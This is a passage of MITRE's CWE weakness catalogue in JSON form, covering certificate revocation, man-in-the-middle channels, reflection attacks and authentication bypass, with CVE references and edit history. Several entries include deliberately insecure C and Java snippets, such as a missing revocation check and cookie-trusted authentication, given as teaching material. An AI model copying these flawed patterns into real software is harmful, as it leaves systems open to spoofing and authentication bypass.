sync.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Trust may be assigned to an entity who is not who it claims to be."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data from an untrusted (and possibly malicious) source may be integrated."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Data may be disclosed to an entity impersonating a trusted entity, resulting in information disclosure."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that certificates are checked for revoked status."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the revoked status."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-124"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate before continuing execution.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// got a certificate, do secret things"}}}},"Body_Text":"Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The software could be communicating with a malicious host."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-2014","Description":"LDAP-over-SSL implementation does not check Certificate Revocation List (CRL), allowing spoofing using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2014"},{"Reference":"CVE-2011-0199","Description":"Operating system does not check Certificate Revocation List (CRL) in some cases, allowing spoofing using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0199"},{"Reference":"CVE-2010-5185","Description":"Antivirus product does not check whether certificates from signed executables have been revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5185"},{"Reference":"CVE-2009-3046","Description":"Web browser does not check if any intermediate certificates are revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046"},{"Reference":"CVE-2009-0161","Description":"chain: Ruby module for OCSP misinterprets a response, preventing detection of a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0161"},{"Reference":"CVE-2011-2701","Description":"chain: incorrect parsing of replies from OCSP responders allows bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2701"},{"Reference":"CVE-2011-0935","Description":"Router can permanently cache certain public keys, which would allow bypass if the certificate is later revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0935"},{"Reference":"CVE-2009-1358","Description":"chain: OS package manager does not properly check the return value, allowing bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1358"},{"Reference":"CVE-2009-0642","Description":"chain: language interpreter does not properly check the return value from an OSCP function, allowing bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0642"},{"Reference":"CVE-2008-4679","Description":"chain: web service component does not call the expected method, which prevents a check for revoked certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4679"},{"Reference":"CVE-2006-4410","Description":"Certificate revocation list not searched for certain certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4410"},{"Reference":"CVE-2006-4409","Description":"Product cannot access certificate revocation list when an HTTP proxy is being used.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4409"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to check for certificate revocation"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Modes_of_Introduction, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Check for Certificate Revocation","attr":{"@_Date":"2009-03-10"}}}},"300":{"attr":{"@_ID":"300","@_Name":"Channel Accessible by Non-Endpoint","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint.","Extended_Description":"In order to establish secure communication between two parties, it is often important to adequately verify the identity of entities at each end of the communication channel. Inadequate or inconsistent verification may result in insufficient or incorrect identification of either communicating entity. This can have negative consequences such as misplaced trust in the entity at the other end of the channel. An attacker can leverage this by interposing between the communicating entities and masquerading as the original entity. In the absence of sufficient verification of identity, such an attacker can eavesdrop and potentially modify the communication between the original entities.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Adversary-in-the-Middle / AITM"},{"Term":"Man-in-the-Middle / MITM"},{"Term":"Person-in-the-Middle / PITM"},{"Term":"Monkey-in-the-Middle"},{"Term":"Monster-in-the-Middle"},{"Term":"On-path attack"},{"Term":"Interception attack"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Application Data","Modify Application Data","Gain Privileges or Assume Identity"],"Note":"An attacker could pose as one of the entities and read or possibly modify the communication."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Always fully authenticate both ends of any communications channel."},{"Phase":"Architecture and Design","Description":"Adhere to the principle of complete mediation."},{"Phase":"Implementation","Description":"A certificate binds an identity to a cryptographic key to authenticate a communicating party. Often, the certificate takes the encrypted form of the hash of the identity of the subject, the public key, and information such as time of issue or expiration using the issuer\'s private key. The certificate can be validated by deciphering the certificate with the issuer\'s public key. See also X.509 certificate signature chains and the PGP certification structure."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the Java snippet below, data is sent over an unencrypted channel to a remote server.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Socket sock;PrintWriter out;try {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"sock = new Socket(REMOTE_HOST, REMOTE_PORT);out = new PrintWriter(echoSocket.getOutputStream(), true);...","xhtml:br":["","","",""],"xhtml:i":"// Write data to remote host via socket output stream."}}}},"Body_Text":"By eavesdropping on the communication channel or posing as the endpoint, an attacker would be able to read all of the transmitted data."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversry-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -&gt; CWE-561 (Dead Code) -&gt; CWE-295 (Improper Certificate Validation) -&gt; CWE-393 (Return of Wrong Status Code) -&gt; CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Man-in-the-middle (MITM)"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":32,"Entry_Name":"Routing Detour"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"466"}},{"attr":{"@_CAPEC_ID":"57"}},{"attr":{"@_CAPEC_ID":"589"}},{"attr":{"@_CAPEC_ID":"590"}},{"attr":{"@_CAPEC_ID":"612"}},{"attr":{"@_CAPEC_ID":"613"}},{"attr":{"@_CAPEC_ID":"615"}},{"attr":{"@_CAPEC_ID":"662"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-244"}}},"Notes":{"Note":{"#text":"The summary identifies multiple distinct possibilities, suggesting that this is a category that must be broken into more specific weaknesses.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Name, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Alternate_Terms, Observed_Examples"}],"Previous_Entry_Name":[{"#text":"Man-in-the-middle (MITM)","attr":{"@_Date":"2008-04-11"}},{"#text":"Channel Accessible by Non-Endpoint (aka \'Man-in-the-Middle\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Channel Accessible by Non-Endpoint (\'Man-in-the-Middle\')","attr":{"@_Date":"2020-02-24"}}]}},"301":{"attr":{"@_ID":"301","@_Name":"Reflection Attack in an Authentication Protocol","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Simple authentication protocols are subject to reflection attacks if a malicious user can use the target machine to impersonate a trusted user.","Extended_Description":{"xhtml:p":["A mutual authentication protocol requires each party to respond to a random challenge by the other party by encrypting it with a pre-shared key. Often, however, such protocols employ the same pre-shared key for communication with a number of different entities. A malicious user or an attacker can easily compromise this protocol without possessing the correct key by employing a reflection attack on the protocol.","Reflection attacks capitalize on mutual authentication schemes in order to trick the target into revealing the secret shared between it and another valid user. In a basic mutual-authentication scheme, a secret is known to both the valid user and the server; this allows them to authenticate. In order that they may verify this shared secret without sending it plainly over the wire, they utilize a Diffie-Hellman-style scheme in which they each pick a value, then request the hash of that value as keyed by the shared secret. In a reflection attack, the attacker claims to be a valid user and requests the hash of a random value from the server. When the server returns this value and requests its own value to be hashed, the attacker opens another connection to the server. This time, the hash requested by the attacker is the value which the server requested in the first connection. When the server returns this hashed value, it is used in the first connection, authenticating the attacker successfully as the impersonated valid user."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"327","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"The primary result of reflection attacks is successful authentication with a target machine -- as an impersonated user."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use different keys for the initiator and responder or of a different type of challenge for the initiator and responder."},{"Phase":"Architecture and Design","Description":"Let the initiator prove its identity before proceeding."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *simple_digest(char *alg,char *buf,unsigned int len, int *olen) {}unsigned char *generate_password_and_cmd(char *password_and_cmd) {}","xhtml:div":[{"#text":"const EVP_MD *m;EVP_MD_CTX ctx;unsigned char *ret;OpenSSL_add_all_digests();if (!(m = EVP_get_digestbyname(alg))) return NULL;if (!(ret = (unsigned char*)malloc(EVP_MAX_MD_SIZE))) return NULL;EVP_DigestInit(&amp;ctx, m);EVP_DigestUpdate(&amp;ctx,buf,len);EVP_DigestFinal(&amp;ctx,ret,olen);return ret;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","",""]},{"#text":"simple_digest(\\"sha1\\",password,strlen(password_and_cmd)...);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String command = new String(\\"some cmd to execute &amp; the password\\") MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(command.getBytes(\\"UTF-8\\"));byte[] digest = encer.digest();","xhtml:br":["",""]}}]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Reflection attack in an auth protocol"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A7","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"90"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Insufficient Validation&#34;, Page 38"}}]},"Notes":{"Note":{"#text":"The term \\"reflection\\" is used in multiple ways within CWE and the community, so its usage should be reviewed.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Other_Notes"}]}},"302":{"attr":{"@_ID":"302","@_Name":"Authentication Bypass by Assumed-Immutable Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"807","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Operation","Implementation"],"Description":"Implement proper protection for immutable data (e.g. environment variable, hidden form fields, etc.)"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, an \\"authenticated\\" cookie is used to determine whether or not a user should be granted access to a system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"boolean authenticated = new Boolean(getCookieValue(\\"authenticated\\")).booleanValue();if (authenticated) {}","xhtml:br":"","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"Modifying the value of a cookie on the client-side is trivial, but many developers assume that cookies are essentially immutable."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0367","Description":"DebPloit","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0367"},{"Reference":"CVE-2004-0261","Description":"Web auth","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0261"},{"Reference":"CVE-2002-1730","Description":"Authentication bypass by setting certain cookies to \\"true\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1730"},{"Reference":"CVE-2002-1734","Description":"Authentication bypass by setting certain cookies to \\"true\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1734"},{"Reference":"CVE-2002-2064","Description":"Admin access by setting a cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2064"},{"Reference":"CVE-2002-2054","Description":"Gain privileges by setting cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2054"},{"Reference":"CVE-2004-1611","Description":"Product trusts authentication information in cookie.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1611"},{"Reference":"CVE-2005-1708","Description":"Authentication bypass by setting admin-testing variable to true.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1708"},{"Reference":"CVE-2005-1787","Description":"Bypass auth and gain privileges by setting a variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1787"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Bypass via Assumed-Immutable Data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC02-J","Entry_Name":"Do not base security checks on untrusted sources"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"274"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"77"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"303":{"attr":{"@_ID":"303","@_Name":"Incorrect Implementation of Authentication Algorithm","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The requirements for the software dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect.","Extended_Description":"This incorrect implementation may allow authentication to be bypassed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2003-0750","Description":"Conditional should have been an \'or\' not an \'and\'.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0750"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Authentication Logic Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"90"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Authentication Logic Error","attr":{"@_Date":"2008-04-11"}},{"#text":"Improper Implementation of Authentication Algorithm","attr":{"@_Date":"2009-05-27"}}]}},"304":{"attr":{"@_ID":"304","@_Name":"Missing Critical Step in Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software implements an authentication technique, but it skips a step that weakens the technique.","Extended_Description":"Authentication techniques should follow the algorithms that define them exactly, otherwise authentication can be bypassed or more easily subjected to brute force 